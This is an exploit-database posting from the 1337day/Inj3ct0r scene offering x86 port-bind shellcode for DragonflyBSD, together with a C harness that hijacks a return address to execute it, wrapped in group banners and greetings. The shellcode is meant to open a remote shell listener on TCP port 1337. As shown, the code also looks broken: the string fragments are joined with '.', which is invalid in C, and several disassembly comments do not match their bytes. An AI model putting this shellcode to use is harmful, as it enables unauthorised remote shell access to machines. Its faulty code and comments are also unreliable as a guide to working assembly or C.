|
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : 1337day.com 0
1 [+] Support e-mail : submit[at]1337day.com 1
0 0
1 ######################################### 1
0 I'm KedAns-Dz member from Inj3ct0r Team 1
1 ######################################### 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
/*
###
# Title : DragonflyBSD PortBind TCP (1337) Shellcode - 98 bytes
# Author : KedAns-Dz
# E-mail : ked-h@hotmail.com (ked-h@1337day.com) | ked-h@exploit-id.com | kedans@facebook.com
# Home : Hassi.Messaoud (30008) - Algeria -(00213555248701)
# Web Site : www.1337day.com * www.exploit-id.com * sec4ever.com
# Facebook : http://facebook.com/KedAns
# platform : bsd/x86
# Impact : PortBind TCP (1337)
# Tested on : DragonflyBSD v2.10.1 (REL)
##
# [Indoushka & SeeMe & L0rd CrusAd3r] => Welcome back Br0ther's <3 ^^ <3
##
# | >> --------+++=[ Dz Offenders Cr3w ]=+++-------- << |
# | > Indoushka * KedAns-Dz * Caddy-Dz * Kalashinkov3 |
# | Jago-dz * Over-X * Kha&miX * Ev!LsCr!pT_Dz * H-KinG |
# | ------------------------------------------------- < |
###
*/
/*....:::| Saha 3idK0um ; Aid MoUbarak to All MusLim's |:::....*/
#include <stdio.h>
#include <string.h>
/*
* DragonflyBSD PortBind TCP (1337) Shellcode - 98 bytes
* Tested on DragonflyBSD v2.10.1 (Default Target : 192.168.1.2)
* Should working on FreeBSD and OpenBSD (^_^) .
*/
char shellcode[]=
"\x6a\x13". // push $0x13
"\x59". // pop %ecx
"\xD9\xee". // fldz
"\xd9\x74\x24\xf4". // fstenv %esp
"\x5b". // pop %ebx
"\x81\x73\x13\x18\x88\x4a". // xor dword %ebx $0x13,$0x4a8818
"\x83\xeb\xfc". // sub %ebx
"\xe2\xf4". // loopd short
"\x29\x48\x1a". // sub dword %eax $0x1a,%ecx
"\xb6\xe7". // mov %dh,$0xe7
"\x8a\x4f\xe7". // mov %cl,%edi
"\x91". // xchg %eax,%ecx
"\x6f". // outs %dx,dword %edi
"\x1a\xb4\x19\xe2\x48\xb4". // sbb %dh,%ecx %ebx ,$0xb448e2
"\x38\x2b". // cmp %ebx,%ch
"\x13\x98\xdf\x1a\x8e\x72". // adc %ebx,dword %eax $0x728e1adf
"\xE0\x12". // loopdne short
"\x13\x98\x01\x0D\x32\xa8". // adc %ebx,dword %eax $0xa8320d01
"\xe2\x87". // loopd short
"\x5e". // pop %esi
"\xa8\x96". // test %al, $0x96
"\x87\x5e\x48". // xchg dword %esi $0x48,%ebx
"\xd8\x20". // fsub dword %eax
"\x84\x40\x45". // test %eax $0x45,%al
"\xcA\x21\x57". // retf $0x5721 (return)
"\x6c". // ins %edi,%dx
"\x33\x28". // xor %ebp,dword %eax
"\x48". // dec %eax
"\xe0\x65". // loopdne short
"\xf1". // int
"\x6b\xe0\x22". // imul %esp,%eax $0x22
"\xf1". // int
"\x7a\xe1". // jpe short
"\x24\x57". // adn %al,$0x57
"\xfb". // sti
"\xd8\x1e". // fcomp dword %esi
"\x8d\x48\x38". // lea %ecx,dword %eax $0x38
"\x71\x13". // jno short
"\x98". // cwde
"\x88\x4a\xde"; // mov %edx,%cl
main()
{
int *ret;
printf("Shellcode lenght=%d\n",sizeof(shellcode));
ret=(int*)&ret+2;
(*ret)=(int)shellcode;
}
/*....:::| Saha 3idK0um ; Aid MoUbarak to All Muslim's |:::....*/
#================[ Exploited By KedAns-Dz * Inj3ct0r Team * ]=====================================
# Greets To : Dz Offenders Cr3w < Algerians HaCkerS > + Rizky Ariestiyansyah * Islam Caddy <3
# + Greets To Inj3ct0r Operators Team : r0073r * Sid3^effectS * r4dc0re * CrosS (www.1337day.com)
# Inj3ct0r Members 31337 : Indoushka * KnocKout * eXeSoul * SeeMe * XroGuE * ZoRLu * gunslinger_
# anT!-Tr0J4n * ^Xecuti0N3r * Kalashinkov3 (www.1337day.com/team) * Dz Offenders Cr3w * Sec4ever
# Exploit-ID Team : jos_ali_joe + Caddy-Dz + kaMtiEz + r3m1ck (exploit-id.com) * Jago-dz * Over-X
# Kha&miX * Str0ke * JF * Ev!LsCr!pT_Dz * H-KinG * www.packetstormsecurity.org * TreX (hotturks.org)
# www.metasploit.com * UE-Team & I-BackTrack * r00tw0rm.com * All Security and Exploits Webs ..
#=================================================================================================
|